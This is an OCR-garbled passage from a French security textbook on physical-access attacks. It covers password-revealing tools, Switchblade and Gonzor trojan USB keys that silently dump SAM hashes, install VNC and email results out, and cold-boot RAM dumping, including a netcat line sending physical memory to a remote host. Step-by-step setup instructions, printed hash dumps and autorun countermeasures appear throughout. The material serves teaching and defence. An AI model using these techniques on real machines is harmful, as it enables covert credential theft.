de dialogue). Là aussi, il existe des utilitaires permettant de visualiser le 
mot de passe caché. Xpass est un de ceux-ci et son utilisation est on ne 
peut plus simple. En fait, celui-ci se résume à un simple exécutable que 
nous lançons, une fenêtre s'ouvre alors et nous invite à glisser avec la souris 
le X sur les astérisques de la boîte de dialogue et le mot de passe est 
immédiatement révélé. 
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Et qui sait... peut-être plus divertissants 


Connectez-vous au service Gmail à l'aide de votre 
Compte Google 


X-Pazs v2.2 “ai Nom d'utilisateur: facissi 


X Drag mouse from the left 'X' icon to a Mot de passe le ss: 


password field to reveal its content, 3 ge nr = 
Mémoriser mes informations sur 


cet ordinateur. 
Connexion 


Impossible d'accéder à mon compte 


| X-Pass v2.2 


s avoir à supprimer le 


Lançons XPass 


Et qui sait... peut-être plus divertissants ; 9 = 
1 p P Connectez-vous au service Gmail à l'aide de votre 


Compte Coogle 


ÉANom d'utilisateur [acissi 


X-Pass v2.2 


Drag mouse from the left 'X' icon to a 
password field to revealits content. 


Mot de passe [ose i I 


H 


Mémoriser mes informations sur 
cet ordinateur. 


acissi 


Connexion ] 


š avoir à supprimer le 
Impossible d'accéder à mon compte 


Mot de passe révélé ! 


2.3.3 Faire sa récolte d'informations 


La première chose que fera une personne mal intentionnée sera de récolter 
rapidement un maximum d'informations pour les décortiquer ensuite. Il 
existe de nombreux logiciels pour y arriver. On peut par exemple récupérer 
l'historique des navigations Internet avec l'utilitaire « ZE History View » que 
l'on associera à « LE Pass view » vu précédemment. 
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De la même manière « Outlook PST Password Recovery » récupérera les mots 
de passe Outlook. « Network Password Recovery » donnera les mots de passe 
utilisés sur le réseau. « Product key » affichera les clés de licence logiciels ins- 
tallées. « Adaptater Watch » nous renseignera sur le matériel réseau en nous 
donnant adresse Mac, ip paramétrage réseau et statistiques protocoles. 


E ProduKey 
File Edit View Help 


PETER 


Preduct ID Product Key 
74-640-4866804-25404 IYP2C24924 -THOTT -WKYSQ-BKBXQ 


g 74-640-4888894-23404 JYP2C-249X4-THOTT-WKY8OQ-BXBXQ LSBBOT 


2 item(s), 1 Selected 


Clés d'enregistrement logiciels 


La récolte d'informations automatisée 


Tous ces outils sont bien édifiants mais cela prend du temps pour les lan- 
cer les uns après les autres or pour un pirate, il faut aller vite. Des outils 
rassemblant toutes ces fonctionnalités existent, l'un d'eux « switch blade- 
Siliv », initialement prévu pour s'exécuter à notre insu à partir d'une clé 
USB que l'on nous donne et que nous insérons dans notre PC, est redou- 
table. Il lance le scan via un autorun.inf qui affiche l'écran traditionnel 
d'ouverture de dossiers qui est affiché lors de l'insertion d'une clé USB, la 
différence est que quand nous cliquons dessus, nous lançons le scan et le 
résultat est consigné dans un fichier (logtxt) où nous trouverons entre 
autres le dump de la base SAM, les mots de passe enregistrés, les informa- 
tions système, bref une analyse complète de notre machine. Quand on sait 
que tout ceci peut se faire à notre insu, cela fait réfléchir. 
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Edtien Affichage Favoris Outis ? 


Grease - ©) 1: VF the hi; Dossees  EE]- 


Adresse | $ C! Documents and Settings\rezor 


Gestion des fithiers a 


À Créer IP FRNERU NOS 
4 Fier ce dasa serie 
vak 


LsaExt.dil 


si Fatæerce dossier 


Produkey.exe 


Autres emplcéments a 
> P 
E mes 
Docisreris partagés j 
piè Pooie de irsvat 
D Fayos receo 


i pwservice.exe 


Les outils de switchblade-siliv 


ii M LSDBOT.Iog - Bloc-notes 

Fichier Edtien Ferrast Affichage ? 

7777 proxy WINS activé . 

Écarte Ethernet Connexion au réseau local: 


suffixe DNS propre à Je connexion : 
Description . . . . . + + + …« . | Carte AMD PCNET Family Ethernet PCI 
Adresse physique . . . . . . . . .: 08-00-27-CC-5A-32 
pHCP activé. . . : eui 
configuration automatique : activée. . . . : oui 
Adresse IP. . . j : 192.168.1.6 
Masque de sous- réseau TS. An te + CP 108020 AN 
passerelle par dÉRAUT to ten a pe. EC LO2 O8 AE 
serveur DHCP. , , . rte des en ee  SÉLOAR DOS IE 
Serveurs, PNS o s s «vecu vas LS L020108:1-1 
192.168.1.1 
Bal Obami Lan ours : samedi 13 juin 2009 09:11:09 
Bail expirant . . . . : Samedi 20 juin 2009 09:11:09 


a Et ha T Be ee 8 Ve a de de ee dat ta 

SORCIER HK [DUIMD SAM ] e te te ve te ve ve e te veve te te we 

VA AV VA a Va a VA A BA Va VA A VA A VO Wa i ia a ia e i e i h e i ie 

using pipe {0F423002-B2C3-4888-BD0A-4C2D9D3C1194 } 

Key length is 16 

Administrateur: 500:C8D9D2991C073022E10BEB902D84645F:3021AA384AB8AA434AB1EEA0145FB06E: : : 
ASPNET :1001 : BADFO0B6F41DF18DE 5 DB4 7F4 81EDBE446:1A82EFE40CDE2C9C7/EE5EE98955FAO0ED 
cdaisi:1003:083F94C239A83669AAD3B43 5B51404EE: 72C95294C4D846B9FFB0F 5015938793 
Helpassistant: 1000:8037C2FB662B5EA59C74EEB5 5CAD9684 : 7535A53 80CF64 F037388293673696F 36: zi 
Invité: 501: NO PASS AB RD K KM HOME HE WHH ECHO H ET IOHO OH ECHO H à NO PAS SWORD K W HEC HEC HOH ECOMUMOHT CU à age 
IUSR.ADMIN:1007:E52CAC67419A94224A3B108F3FA6CB6D : 8846F7EAEE8FB117AD068DD8230875 86C : it 
rezor :1002 :1443BB8D40825575AAAD3 B4 3 5851404EE : 6F9B6AA9A8F8033CEF006D45FF5D0230::: 
test2_oph:1005:13040C05676E522171E33FEF 49303985 : 5A85356B4994A104F0274972D385F6D39::: 
testoph3:1006 :CSCOA19DA8BAFCGLABOB09B894A43 0A5 : 7DB51947D90F10DFDD04B3D3B79A4C44 : 

test —0ph 6867E10387F2BD5 


tn n24, Col56 
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Une autre version de switchblade est « gouzor-switchblade » celle-ci contient 
un peu plus d'outils que la version Siliv, bref en combinant les deux (les 
scripts sont simples à comprendre) nous pouvons obtenir un outil de scan 
machine très performant. 


Fichier Edkion Affichage Favoris Outis ? 
Grece - €) À Rechercher di; Dossers KER- 


Adesse | à C:\Documerts and Settings\reze\Mes documents\PCinfolbatexe 


: PESI awatch.exe GR EE cports.exe 
Gestion dec fichiers a Hi e h E F4 +5 
LÉ Créer un nouve dossier j SE 
7 riri, k & y 


pirer Passwords Y.. FE 


Autres emphcements Š 3 ci ide MSLOS Le nmande 46-005 


È Penfao 
RE Mesdocumerds : exe p pass.exe 
; Écosse ; Passord Recovery 

jé lmorents padegés 


 Fe-vis réseau 


Détails g progstart.bat eee 
5 dns Pre torage W SI Password Recovary 

botexe 

Dosse: da ichi 


Les outils de gonzor-switchblade 
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Fichier Edition  Affichege Favoris Outils ? 
1 2 Rechercher -f . Dossiers 
: nE IEPasseor: 
Gestion des fichiers i i RAST EGEN } À Frefox DLNA 
1 Ko 


Ș Gréci unriouveeudussier 


5@ Publie: ce dossier sur letek IMClients.html um À Instaledupdates.html 
Freier Décuraëré à | Frato Doureent 


55K0 


mailhtml Í D, MozilaCockies.htm 
Autres emplacements Frefex Document @ Firofos Docuit 
fiko 


aj; Partager ce cassier 


; Lump 


[a Mes docwneris ēpter | à NetworkPasswords, html 
j s "rafe Document a | Fizio Douet 
3 Doctenents partagés Ki 7 Jito 


16 Poste de travail 


B vis ré: ProductKey.html 
AN Favoris réses Document Firefox Document 
4 K 5 i Ka 
Détails em} PstPassword.html B selected.html 
3 À Frefox Documeré Fiefov Docureset 
LSOBAT 4 1Ko 1 Ko 


Dossier de fichters n 
Date de modification. sams 13 hin Startup.html 
:3 Frefex Document 


7 RG 
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2.3.5 Les clés USB U3 


Une nouvelle génération de clés USB dites de type U3 est apparue sur le 
marché, développée conjointement par les sociétés Sandisk [11] et M-Sys- 
tems. La technologie U3 est une plate-forme informatique portable qui 
nous permet de transporter nos applications sur un lecteur USB et de les 
exécuter sur n'importe quel ordinateur. Quand nous insérons la clé U3 dans 
notre ordinateur (2000 & XP), Windows installe automatiquement quel- 
ques pilotes et nous voyons apparaître un programme de lancement U3 
avec des programmes prêts à être exécutés. 
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Disque amovible (G:). 


LAUNCHPAD 


U3 SMART PROGRAMS 


res) Explorer le lecteur G: 


i & Paramètres >> 

$ 

| ra) Ajouter programmes 22 

f e] 

| Í 
o | 2) Aide et Support >> d 
E f d 
t] | 
| | 
i Î a 
| | 
d f ` i : | 
| | [ZA Site Web SanDisk U3 —] 
A i i 
i l 2 d 
i f Activer la sécurité 
| 
l 
r À 


Le menu U3 


Si nous regardons dans le poste de travail, nous pouvons voir que la clé est 
partitionnée en deux parties. La première, (~4 Mo), contient le lanceur U3 
qui est vu par Windows comme un lecteur de CD. Ceci interdit de ce fait 
de supprimer les fichiers du lanceur et permet son lancement automatique 
par le système. La deuxième est une zone de stockage classique de clé USB 
où nous pouvons lire et écrire. 
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g My Computer 


File Edit View Favorites Toels Help 


System Tasks 


fa) View system information 
T) Add or remove programs 
G Change a setting 


Le poste de travail après insertion d'une clé U3 


Dès l'insertion de votre clé U3, vous voyez apparaître une icône U3 dans la 
barre de notification de la barre des tâches, un clic sur cette icône affiche 
un menu qui ressemble au menu Démarrer de Windows. Vous pouvez 
également ajouter des applications (libres ou payantes). 


Le logiciel Gonzor-SwitchBlade 


On le devine, certains ont vu là une opportunité et le fameux switchblade 
dont nous avons parlé tout à l'heure s'est vite retrouvé implémenté sur ce 
type de clé. Nous allons étudier son implémentation : il faut d'abord récu- 
pérer Gonzor- switchblade V2.0 sur Internet ainsi que Universal Customer. 
Après les avoir dézippés si nécessaire, il faut remplacer le U3CUSTOM.ISO 
se trouvant dans C:\Universal_Customizer\BIN par celui se trouvant dans le 
répertoire GonZors_SwitchBlade puis lancer C:\Universal_Customizer\Uni- 
versal_Customizer.exe en ayant au préalable inséré notre clé U3. Le logiciel 
nous demande d'abord un mot de passe pour protéger les données de la clé 
qui vont être sauvegardées dans un format zip pendant l'opération puis 
restaurées ensuite. 
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U3 Customizer Disque amevible (G:) 


aasarin iam aE AOSA NAAT E OA AAA ent ts ne tar tte nero sien ol ie tt 


- 1 . All data on your U3 smart drive will be backed up to a 
Disclaimer password-protected ZIP file created by U3 Customizer, After 
the custemization is complete, your data will be restored 
2 automatically, 


Introduction <U3-Backup-140609-00001642987102E5S.zip> will be saved 
to the following location: 


Customizing 


5 Retype password; — LL 
Complete [essssel 


Q Cancel 


Installation du launcher et sauvegarde des données de la clé 


Une fois le launcher installé, il nous faut retirer la clé, la remettre et copier 
le fichier shconfig.exe se trouvant dans Gonzor-SwitchBlade sur la clé U3. 
Nous le lançons et nous nous retrouvons avec une interface graphique qui 
va nous permettre de configurer les actions que nous désirons exécuter sur 
l'ordinateur cible. Comme nous pouvons le constater, elles sont nombreu- 
ses allant du dump de la base SAM jusqu'à l'installation d'un serveur VNC 
permettant un accès distant en passant par l'exécution de hacksaw qui per- 
met l'envoi de données via un e-mail en automatique. 
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58. -=GonZor=- Payload Config 
f Payload Options — p HakSaw Setup 


JV Dump System Info | E mail to: 


M Dump External IP | FU G@gmalcom 


| 
| ` | Email from: 
f 
| 
| 


FIW VNC Install | - 
l j gmail.com 


M HakSaw Install | | Pasenord 
M Dump Wifi Hex | | Frs 


M Dump SAM (PWDUMP) | Display Password | 


M Dump SAM (FGDUMP) SMTP Server: 


MV Dump Network Passwords | [smtp.gmail. com 


[V Dump Mail Passwords | | SMTP Port: 


[V Dump Firefox Passwords | [a65 


F a E E nE AAE SAE S ER LR à 


| - External IP URL 
W Dump Messenger Passwords | 


J7 Dump Cache 


jv. Dump LSA Secrets | Tan PL Oif | 
NW Dump Product Keys i 

| Select All Payload Options | 
[V Dump URL History l 
F Dump Updates_List | Deselect All Payload Options | 
M Dump Network Services | Reset Default Settings | 


[V Dump Port Scan 


| 


M Dump IE Passwords 


Tum U3 Launchpad Off | Quit | 


Configuration des actions à exécuter sur l'ordinateur cible 


Nous cliquons ensuite sur Update Config et cette configuration est enre- 
gistrée. Notre clé U3 piégée est prête à fonctionner. Nous l'insérons dans 
l'ordinateur cible et attendons l'apparition de l'icône U3 dans la barre des 
tâches signalant de façon classique l'utilisation d'une clé USB U3. 
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Il suffit ensuite de récupérer celle-ci et d'ouvrir dans le répertoire (caché) 
system/logs/nom de l'ordinateur cible le fichier s'y trouvant pour s'apercevoir 
que nous sommes en possession d'un scan complet de la machine, compre- 
nant entre autres la base SAM, les clés de produits des différents logiciels 
installés, les mots de passe courriel ou stockés et beaucoup d'autres choses 
confidentielles. 


; ARE E E EE i 
EEE EEE + 
‘HakSaw was installed silently 


Network Name (SSID): acissi-..:. 


Key Type : WEP] 

Key (Hex) LR Late Nr PSS SES 

Key (Ascii) : BAXM2@< Çm ZK 

‘Adapter Name : LAN-Express IEEE 802.11 PCI Adapte 
‘Adapter Guid : {9B0187F1-3DC8-4C13-A764- 
‘A6A91DD2BF27} 


Rapport de l'audit effectué par Gonzor-SwitchBlade 


Rassurez-vous, ce logiciel est détecté par les antivirus au moment de son 
exécution. Malgré tout, rien ne garantit que des programmes encore incon- 
nus des antivirus n'existent pas et n'utilisent pas cette méthode de clé 
piégée. Il fût un temps où nous trouvions bizarrement des clés USB aban- 
données dans les parkings ! 
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Using pipe {8824E1A8-6F59-4671- 3c01- 8B0DE66BA5E9} 
Key Tength is 16 

Administrateur : 500 :14438B0408255754AAD3643 5851404EE : 6F9B6AAJASF8033CEF006D45FF500230; is 
ASPNET : 1001 :BADFOB6F41DF18DE5DB47F481EDBE446:1A82EFE4OCDE2COC7EE5EE98955FAQED: 
Helpassistant: 1005 :370D22701F9D7621A672248DB68F46247: 7C80ABEC9403A84055C36FA117DASE5C: 
invité: 501: NO PASSWER D KA HO kikihi khkk kkk kikik . NO PASSWORDY H WW he H tete YOH de de Ye tihe heti heie 

rezor :1002:144386D40825575AAAD35435851404EE: SRB ADABEBO33CEFOOGDASFF 500230: 

single- kE :1006:14438BD4082557 5AAAD 384 35B51404EE: GFOBGAADABF B033C EF OO ËDA SF FSD02 30: : : 
completed. 


pwdumpe version 1.5.0-BETA by fizzgig and the mighty group at foofus. net 
Ha THIS IS A BETA VERSION! YOU HAVE BEEN WARNED. 
copyright 2006 foofus.net 


This program is free software under the GNU 

General Public License version 2 (GNU GPL), you can redistribute it and/or 
modify it under the terms of the GNU GPL, as published by the Free software 
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS 
PROGRAM. Please see the COPYING file included with this program 

and the GNU GPL for further details. 


tnt, Cel t 


Le dump de la base SAM par SwitchBlade 


2.3.7 Contre-mesures aux clés U3 piégées 


` 


Il existe des contre-mesures à ces clés piégées. Il faut d'abord désactiver 
l'Autorun dans la base de registre. Démarrons le gestionnaire des clés de 
registre en lançant regedit puis éditons la clé HKEY LOCAL_ 
MACHINE\SYSTEM\ControlSet001\Services\Cdrom. Il faut mettre la valeur 
de la clé Autorun à 0. 
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Fichier Edition Affichage Favoris ? 
f >- (1 audstub Données 

: j) Pate i É Dh (valeur non définie) 
z -L Beep l torun REG_DWORD 0x00000001 (1) 
n a N REG_MULTI_SZ NEC MER-7 NEC MI 
E EJ cbidf2k REG_MULTI_SZ SCSI miniport 
È ji s REG_S2 Pilote de CD-ROM 
> LI cdzoxrnt 
: (E cdaudio REG_DWORD 0x00000001 (1) 
: E cdfs fab} REG_SZ SCSI CDROM Class 
1E Cdrom El REG_EXPAND_SZ system32\DRIVERS\cdron 
à LEA Erum Ri REG_DWORD 0x00000001 {1} 
: ©] Changer Es] REG_DWORD 0x00000002 (2) 
j- CI Gisve Es REG_DWORD 0x00000001 (1) 
> -C3 ClipSrv 
5-2 clr_optimizal 
> È] CmBatt 
; C1 crdide 
t0 Compbatt 
b 


4 ls ar , 


Poste de travail HKEY_LOCAL_MACH 


Désactivation de l'Autorun 


Désactiver l'Autorun ne suffit pas, il existe d'autres logiciels comme Switch 
Blade qui permettent de lancer un .bat quand on clique sur My computer 
lors de l'automontage. Il faut alors lancer la stratégie de groupe avec 
gpedit.msc et désactiver l'option d'automontage dans Modèles d'adminis- 
tration - Désactiver le lecteur automatique. 
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‘fa À Stratégie de groupe 
Fichier Action Affichage ? 
e» ON FEB 2E 
E] Stratégie Ordinateur local 
4 Configuration ordinateur 
p (3 Paramètres du logiciel 
f È - (3 Paramètres Windows 
i 4 EJ Modèles d'administration 
p s] Système 


Paramètre 


né a (protection de fichier Windows 
Afficher les Propriétés {4 (appel de procédure distante 


Désactiver le lecteur automatique 


e- È] Réseau 
: C Imprimantes 
n - 3 Composants Window. 
À PC Configuration utdisateur 
b -£ Paramètres du logiciel 


Configwatanrequise : 
Au minimum Microsoft Windows 2099 


Désact la fonction de lecture 
automaïque. 


| Liservice de temps Windows 
| Cestion de la communication Internet 
| CAcon distribué 


E| E Restreindre des fonctions d'aide HTML potentiellement non sécuri.. 
ei Ne pas afficher la page Configurer votre serveur lors de l'ouvertu.… 


| M Afficher l'arrêt du moniteur d'événements 
lecture dès que vou arte E Activer la fonctionnalité des données sur l'état du système du mo... 
médadansle lecteur, Ans, les E Activer le datage permanent 
Schiers d'instafation des programmes | EH Spécifier l'emplacement du fichier d'installatien de Windows 
$ 


o J Paramètres Windows 


& -{L] Modèles d'administration La lecture automatique lance la 


etla Sique Sur un média audio Spécifier l'emplacernent du fichier d'instalation du Service Pack Wi... 
démarrent immédiatement. ži 
W Supprimer les messages d'état de Démarrage / Arrêt / @uverture ... 
W Messages d'état détaillés ou normaux 
à Restreindre roxécinonu de ces programmes à partir de l'Aide 
x PA pa 


Par déf faut, la lecture automatique 
ŝe sur les iscteurs 
tels que les lecteurs de 
disquette {mais pas les lecs CD- 
ROM}, et sur les lecteurs réseau, 


f3) Ne pas EE automatiquement k \ dix 

EM Télécharger les composants manquants 

Autoriser les clients de suivi de lien distribué à utiliser les ressourc… 

4 Ne pas éteindre l'alimentation de l'ordinateur après l'arrêt du syst... 
bésactiver l'invite de recherche de pilotes d'imprimantes Windows... 


Si vous activez ce paramètre, vons 
pouvez également désacter ia 4 
fecture automatique surles lecteurs Eu 
de CD-ROM, où désactiver la lectore 
automatique sur tous es lecteurs. 


H 
Ce naramètra récartiva la lechire fl 


Désactivation de l'automontage 


2.3.8 Les dump mémoires 


La solidité d'une chaîne est conditionnée par celle de son maillon le plus 
faible. C'est de cette manière que le vol d'un seul ordinateur portable peut 
entraîner des pertes colossales : des données sensibles sont stockées sur ces 
postes nomades. Les experts en sécurité informatique recommandent le 
cryptage des données, donc du disque dur. 


La sécurité des données dans ce cas repose sur le fait que la mémoire vive 
est effacée dès qu'elle n'est plus sous tension. La seule façon de récupérer 
alors la clé de cryptage est de contrôler la machine. Cela était sans compter 
sur la possibilité de "dumper" ou en français "vider" la mémoire vive de nos 
données. 
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Il existe ainsi plusieurs façons de dumper la mémoire mais pour toutes il 
faut être administrateur. La première de ces façons, (souvent utilisée dans 
le cadre d'un debbuging) est de provoquer un crash général. En effet, il est 
possible de paramètrer le système pour enregistrer tout le contenu de la 
mémoire dans c:\windows\memory.dmp. Il faut pour cela aller dans Panneau 
de configuration - Système - Avancé - Démarrage et récupération et 
de choisir de sauver la mémoire complète. 


Démarrage et récupération 


Démarrage du système 


Système d'exploitation par défaut : 


"Microsoft Windows XP Professionnel" Inoexecute=optin Jfastdet |x 
[F] Afficher la liste des systèmes d'exploitation pendant : 


[Z] Afficher les options de récupération pendant : 


Cliquez sur Modifier pour modifier les options de démarrage. | Modifier | 


Défaillance du système 
FZ lÉcrire un événement dans le journal système 
FZ] Envoyer une alerte d'administration 

: [| Redém.arrer automatiquement 


Écriture des informations de débogage 


ii moii i 
Fichier de l'image mém 
| SeSystemRoot%\MEMORY.DMP | 


{F} Remplacer tous les fichiers existants 


Come.) 


Paramétrage d'un dump mémoire sous XP 
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Un crash peut être forcé avec une combinaison de touches, si la clé 
HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSer\Services\i8042prt\Pa- 
rameters\CrashOnCtrlScroll vaut 1, l'appui simultané de la touche [Ctrl] à 
droite du clavier et de deux fois la touche [Arrêt défil] provoque l'arrêt du 
système. 


La deuxième méthode est la mise en veille prolongée qui dumpe la 
mémoire dans le fichier C:\hiberfil.sys. Malheureusement le fichier d'hiber- 
nation est dans un format peu documenté utilisant un algorithme Micro- 
soft et ne stocke que des pages mémoires utilisées et pas celles récemment 
libérées. Nous pouvons malgré tout y accéder via des fonctions exportées. 


La troisième méthode est d'utiliser le périphérique \\ \PhysicalMemory per- 
mettant de lire directement la mémoire. Nous utiliserons l'utilitaire dd [12] 
avec la commande dd.exe if=\\.\PhysicalMemory of=dump.dmp ou l'utilitaire 
nc avec la commande nc -v -n -[\\.\Physical Memory <ip> <port>. 


Les données en mémoire 


Afin d'augmenter l'autonomie, de nombreux dispositifs d'économie 
d'énergie ont été mis en place comme la mise en veille prolongée. On peut 
donc imaginer qu'un portable dérobé reste alimenté en mode verrouillé ou 
en veille. Les informations sont donc toujours dans la RAM. 


Des chercheurs de l'Université de Princeton ont démontré (février 2008) 
que celles-ci étaient encore présentes dans la mémoire deux à vingt secon- 
des après l'arrêt du système, c'est le phénomène de rémanence. Ils ont éga- 
lement mis en évidence que si on refroidit la mémoire (-50°) ce temps pou- 
vait être porté à cinq minutes. 


Certains diront qu'il n'est pas facile de refroidir une mémoire RAM à ces 
températures, en fait c'est beaucoup plus facile que l'on ne le croit, les lois 
de la physique vont nous aider. En fait, il est possible de la refroidir effica- 
cement et à peu de frais grâce aux sprays propulsant de l'air, utilisé entre 
autres pour éliminer la poussière à l'intérieur des ordinateurs. En effet, la 
réaction utilisée est endothermique et appliqué pendant quelques secondes 
à faible distance, ce spray est capable de refroidir des composants dans la 
gamme de température qui nous intéresse. 
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Refroidissement de la mémoire 


En fait, il est possible de garder des informations pendant quelques minu- 
tes, même quand la mémoire est sortie de l'ordinateur. Des chercheurs ont 
poussé l'expérience jusqu'à plonger la barette mémoire dans de l'azote 
liquide à -196° et ont conservé la totalité des données plus d'une heure. 


Temps de rémanence 
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2.3.10Créer une clé bootable pour dumper la mémoire 


Pour exploiter cette rémanence, il faut pouvoir dumper la mémoire. Sur 

Linux, il est possible d'accéder à la mémoire via le périphérique /dev/meim. 

La difficulté étant de conserver un maximum des données encore présentes 

dans celle-ci. En effet, démarrer sur un livecd efface plus de la moitié de la 

mémoire vive. Le programme à démarrer doit être le plus petit possible. 

Deux solutions sont alors possibles : 

- Démarrer en PXE via le réseau et charger un petit programme qui dum- 
pera la mémoire. 

- Lancer un mini programme à partir d'une clé USB qui dumpera la mé- 
moire et en stockera le contenu. 


Pour exploiter cela un hacker (Weslay), a créé une version bootable sur clé 
USB d’un dumper de RAM. Le logiciel fonctionne grâce à un mini système, 
syslinux qui se lance via une clé USB et qui enregistre la RAM. Pour réali- 
ser cette clé bootable, nous avons besoin de plusieurs logiciels qui sont le 
bootloader syslinux 3.72 [13] et le soft msramdmp [14]. Il existe aussi une 
image iso pour un CD bootable msramdmp [15]. 


Nous allons étape par étape, créer cette clé bootable qui nous permettra de 
dumper la mémoire. Commençons par préparer la clé, nous utiliserons 
cfdisk. Pour être certains d'avoir une clé propre, nous allons la remplir de 
zéros avec l'utilitaire dd dans une distribution Linux. 


Nous devons dans un premier temps repérer notre clé, après insertion nous 
lançons la commande dmesg dans un shell, en fin de fichier nous devrions 
trouver notre type de périphérique. 


[sdd] 15794176 512-byte hardware sectors; (8,08 GB/7,53 GiB) 
[sdd] Write Protect is off 

[sdd] Hode Sense: 00 00 00 00 

[sdd] Assuming drive cache? write throush 


[sdd] 15794176 512-byte hardware sectors: (8,08 GB/7,53 GiB) 
[sdd] Write Protect is off 
[sdd] Mode Sense: 00 00 00 00 
[sdd] Assuming drive cache? write through 
dd2 sdd3 sddd 


Repérage de la clé USB 
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Nous remplissons ensuite notre périphérique de zéros à l'aide de la com- 
mande dd if /dev/zero of=/dev/sdd, ceci afin d'avoir une clé propre. 


Nous devons maintenant préparer la clé pour qu'elle puisse recevoir le 
dump mémoire. Nous allons créer la table des partitions sur celle-ci, nous 
aurons besoin d'une partition amorçable DOS d'1 Mo, et de partitions de 
type 40 (venix 80286) d'une taille supérieure à la mémoire et destinées à 
stocker le dump. Nous disposons d'une clé de 8 Go nous allons créer une 
partition DOS de 8 Mo qui suffira au système minimaliste que nous instal- 
lerons ensuite, puis 3 partitions venix 80286 de 1 Go chacune, la mémoire 
à dumper faisant 1 Go. 


cfdisk (util-linux-ng 2.14) 


Unité de disque: /dev/sdd 
Taille: 8086618112 octets, 8086 Mo 
Têtes: 249 Secteurs par piste: 62 Cylindres: 1023 


Non Fanions Part Type Type SF Létiq,] Taille (Ho) 
S Primaire 9 
sdd2 Primaire Venix 80286 1027,56 
sdd3 Primaire Venix 80286 1027,56 
sdd4 Primaire Venix 80286 1027,56 
Inutilisable 4995,49 


MERE) [Détruire 1 [ Aide ] [Naxiniser } [ Afficher ] [ Quitter } [ Type ] [Unités ] 
[ Écrire } 


Basculer le fanion d'amorce peur la partition courante] 


Préparation de la clé 


Une fois la mémoire dumpée, ces partitions deviendront des partitions de 
type PPC PreP Boot, ceci pour éviter d'écraser le premier dump si nous vou- 
lons en faire un second. Nous formatons ensuite la partition fat16 avec la 
commande mkfs.msdos /dev/sdd1. Nous aurons pris soin au préalable 
d'installer dosfstools. 
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Notre support est prêt. 


Nous téléchargeons le fichier syslinux-3.72.tar.gz qui est compressé. La com- 
mande var - zxvf syslinux-3.72.tar.gz nous permet de le décompresser. 
Nous nous déplaçons ensuite dans le répertoire syslinux-3.72 généré avec la 
commande cd syslinux-3.72. Nous tapons ensuite la commande make 
qui démarre la compilation de syslinux-3.72. 


Il faut maintenant installer le master boot record sur notre clé USB. Nous 
allons nous déplacer dans le répertoire #br à l'aide de la commande cd mbr 
et nous installons le master boot record via la commande dd if=mbr.bin 


of=/dev/sdd. 


Sbash-3,2# cd nbr/ 

bash-3,2# ls -l 

total 124 

-ru-rw-r-- 1 1026 1026 1217 sept. 26 2008 Makefile 
-ruxruxr-x 1 1026 1026 863 sept, 26 2008 checksize,pl 
-ru-rw-r-- 1 1026 1026 6660 sept, 26 2008 gptnbr,.S 
=ruxr-xr-x 1 root 1026 424 juin 14 18:40 gptmbr.bin 
-ruxr-xr-x 1 root 1026 3484 juin 14 18:40 gptmbr.elf 
-rw-r--r-- 1 root 1026 14204 juin 14 18:40 gptmbr. lst 
-ru-r--r-- 1 root 1026 2400 juin 14 18:40 gptmbr.o 
-ru-ru-r-- 1 1026 1026 5131 sept, 26 2008 isohdpfx.S 
-ruxr-xr-x 1 root 1026 271 juin 14 18:40 isohdpfx.bin 
“ruxr-xr-x 1 root 1026 3289 juin 14 18:40 isohdpfx.elf 
-ru-r--r-- 1 root 1026 11139 juin 14 18:40 isohdpfx.lst 
-ru-r--r-- 1 root 1026 2204 juin 14 18:40 isohdpfx,o 
-ru-ru-r—- 1 1026 1026 6889 sept, 26 2008 mbr.S 
=ruxr-xr-x 1 root 1026 404 juin 14 18:40 mbr,bin 1 
=ru =x =x t root t026 —3429-jutn tt 1870 morei- 
-ru-ru-r-- 1 1026 1026 1882 sept, 26 2008 mbr,ld 
-ru-r--r-- 1 root 1026 14478 juin 14 18:40 mbr.lst 
-ru-r--r-- 1 root 1026 2364 juin 14 18:40 mbr.o 
-ru-ru-r-- 1 1026 1026 5714 sept, Î 2008 oldmbr, asm 
bash-3.2# dd if=mbr.bin of=/dev/sdd] 


Installation du master boot record de la clé 


Revenons dans le répertoire syslinux, déplaçons-nous dans le répertoire 
Linux où nous trouverons le binaire syslinux (cd ../linux) et lançons l'instal- 
lation de syslinux sur notre partition de boot avec la commande ./syslinux 


/dev/sdd1. 
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Ar a EEr Le et 1026 24580 jun 14 18: 4 aira 


Juin 14 t87 nomtools 
-ru-ru-r-- 1 1026 1026 $2143 E 26 2008 E c 
-rw-r--r-- 1 root 1026 16208 juin 14 18:44 syslinux,o 
bash-3,2# ,/syslinux /dev/sddil 


Installation de syslinux sur la clé 


Notre clé est maintenant prête à recevoir les utilitaires de dump mémoire. 
Décompressons l'archive msramdmp.tar.gz téléchargée précédemment 
[14] avec la commande tar -zxvf msramdmp.tar.gz. Nous allons mainte- 
nant copier les utilitaires de dump mémoire dans notre partition DOS. 
Nous devons monter celle-ci dans un répertoire nommé flash que nous 
aurons créé au préalable dans l'arborescence /mnt (mkdir/mnt/flash). Pla- 
çons-nous dans le répertoire msramdmp (cd msramdmp) et tapons la com- 
mande mount /dev/sdd1 /mnt/flash. Nous copions ensuite les fichiers 
msramdmp.c32 et  syslinux.cfg dans /mnt/flash avec la commande 
cp msramdmp.c32 syslinux.cfg /mnt/flash. 


bash-3,2# mount /deu/sddi /mnt/flash 

bash-3,2# ls -al 

total 56 

druxr-xr-x 2 rezon users 4096 mars 5 2008. 

drwxr-xr-x 5 rezor users 4096 juin 14 18:38 ,, 
-ruxr-xr-x 1 rezor users 302 mars 2008 build,sh 
-rw-r--r-- 1 rezor users 724 mars 2008 c32entry,o 
-rw-r--r-- 1 rezor users 5770 mars 2008 liboldcom32,a 
-Fu-r--r-- 1 rezor users 5363 mars 2008 msramdmp,c 
—ruxr-xr-x 1 rezor users 3384 mars 2008 msramdmp,c32 
-ruxr-xr-x 1 rezon users 8743 mars 2008 msramdmp.elf 
-rw-r--r-- 1 rezor users 3064 mars 2008 msramdnp,o 
“Puxr-xr-x 1 rezor users 49 mars 2008 syslinux.cfg 
Mbash-3,2# cp msrramdmp,c32 syslinux.cfg /mnt/ flashi 


nds cd msramdmp 


ON O1 C1 C1 1 ND NN 


Copie des utilitaires de dump sur notre clé 


Sécurité informatique 


Apprendre l'attaque pour mieux se défendre 


Notre clé est prête, insérons-la sur la machine cible, arrêtons brutalement 
celle-ci et redémarrons en choisissant de booter sur la clé préparée. Le 
dump démarre. Le temps nécessaire au dump dépend bien entendu de la 
taille mémoire. Une fois le dump exécuté, nous insérons la clé dans notre 
